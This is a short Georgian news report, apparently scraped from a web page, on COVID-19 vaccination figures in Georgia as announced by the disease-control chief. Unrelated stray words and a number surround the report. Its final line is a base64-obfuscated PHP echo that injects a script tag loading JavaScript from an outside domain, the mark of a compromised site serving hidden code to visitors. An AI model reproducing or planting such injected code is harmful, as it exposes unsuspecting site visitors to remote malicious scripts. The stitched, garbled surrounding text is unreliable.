celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის ამირან გამუყრელიძის განცხადებით, საქართველოში უკვე აცრილია 8536 მოქალაქე და რიგს ელოდება 13 736. განცხადება მან დღეს გამართულ პრესკონფერენციაზე გააკეთა.
 
„დღეისთვის 8536 მედიცინის მუშაკი და 65 წელს ზემოთ ჩვენი მოქალაქე იყო აცრილი, მათგან 6780 „ასტრაზენეკათი“ და 1756 „ფაიზერით“. მომავალი 2 კვირის განმავლობაში, 14 აპრილამდე დაჯავშნილია 13 736 ადგილი ქვეყნის მასშტაბით“, - განაცხადა ამირან გამყრელიძემ.
 
მანვე დასძინა, რომ ვაქცინაციის პროცესი 5 აპრილიდან გაფართოვდება და მსურველთა რიცხვს პირველ რიგში 55 წელს ზემოთ მოქალაქეები, ასევე „დიალიზზე“ მყოფი ადამიანები და ორგანოგადანერგილი მოქალაქეები დაემატებიან.
1492
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");